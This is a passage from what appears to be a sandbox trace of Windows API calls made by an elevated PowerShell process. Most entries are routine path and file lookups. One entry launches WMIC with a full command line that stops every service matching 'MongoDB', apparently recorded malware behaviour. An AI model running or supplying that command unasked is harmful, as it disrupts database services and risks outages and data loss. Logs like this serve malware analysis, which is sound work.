lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0304.474] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0304.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0304.474] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0304.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0304.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0304.475] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0304.475] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0304.475] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0304.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0304.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0304.475] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0304.475] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0304.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0304.475] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0304.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0304.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0304.476] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0304.476] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0304.476] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0304.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0304.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0304.476] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0304.476] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0304.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0304.477] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0304.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0304.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0304.477] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0304.477] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0304.477] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c8a0 [0304.477] FindNextFileW (in: hFindFile=0x7e1c8a0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0304.477] FindClose (in: hFindFile=0x7e1c8a0 | out: hFindFile=0x7e1c8a0) returned 1 [0304.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0304.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0304.478] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0304.478] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xab, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.478] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.478] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xab, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xab, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.478] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0304.479] GetConsoleWindow () returned 0x302b8 [0304.486] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0304.486] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0304.486] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0304.487] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0304.487] CoTaskMemFree (pv=0x7e29450) [0304.488] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c9f844 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice", lpProcessInformation=0x4c9f844*(hProcess=0x994, hThread=0x990, dwProcessId=0x428, dwThreadId=0xbdc)) returned 1 [0304.505] CloseHandle (hObject=0x990) returned 1 [0304.505] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0304.505] GetCurrentProcess () returned 0xffffffff [0304.506] GetCurrentProcess () returned 0xffffffff [0304.506] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x994, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x990) returned 1 [0304.506] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x990, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0306.364] CloseHandle (hObject=0x990) returned 1 [0306.365] GetExitCodeProcess (in: hProcess=0x994, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0306.366] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0306.368] CloseHandle (hObject=0x994) returned 1 [0306.369] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xab, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.370] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xab, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.370] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.371] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.371] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.371] SetEvent (hEvent=0x97c) returned 1 [0306.371] SetEvent (hEvent=0xa30) returned 1 [0306.371] SetEvent (hEvent=0xa34) returned 1 [0306.371] SetEvent (hEvent=0xa38) returned 1 [0306.372] SetEvent (hEvent=0x980) returned 1 [0306.372] SetEvent (hEvent=0x978) returned 1 [0306.372] SetEvent (hEvent=0x974) returned 1 [0306.372] SetEvent (hEvent=0x984) returned 1 [0306.372] SetEvent (hEvent=0x98c) returned 1 [0306.372] SetEvent (hEvent=0x988) returned 1 [0306.373] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0306.376] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0306.378] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xd4ff77fa, Data2=0x5efa, Data3=0x471e, Data4=([0]=0x89, [1]=0x6c, [2]=0x9d, [3]=0x9f, [4]=0x9, [5]=0xb4, [6]=0xa1, [7]=0x4e))) returned 0x0 [0306.379] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=40141341724) returned 1 [0306.379] AmsiOpenSession () returned 0x0 [0306.379] AmsiScanString () returned 0x80070015 [0306.387] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=40142195400) returned 1 [0306.388] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0306.388] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.388] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.388] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.388] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.388] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.388] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0306.439] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="\x1c") returned 0x0 [0306.439] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0306.439] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0306.440] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0306.440] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0306.440] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0306.440] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0306.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0306.440] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0306.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0306.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0306.441] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0306.441] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0306.441] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0306.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0306.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0306.441] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0306.441] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0306.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0306.441] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0306.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0306.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0306.442] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0306.442] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0306.442] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0306.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0306.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0306.442] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0306.442] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0306.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0306.442] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0306.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0306.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0306.442] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0306.443] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", 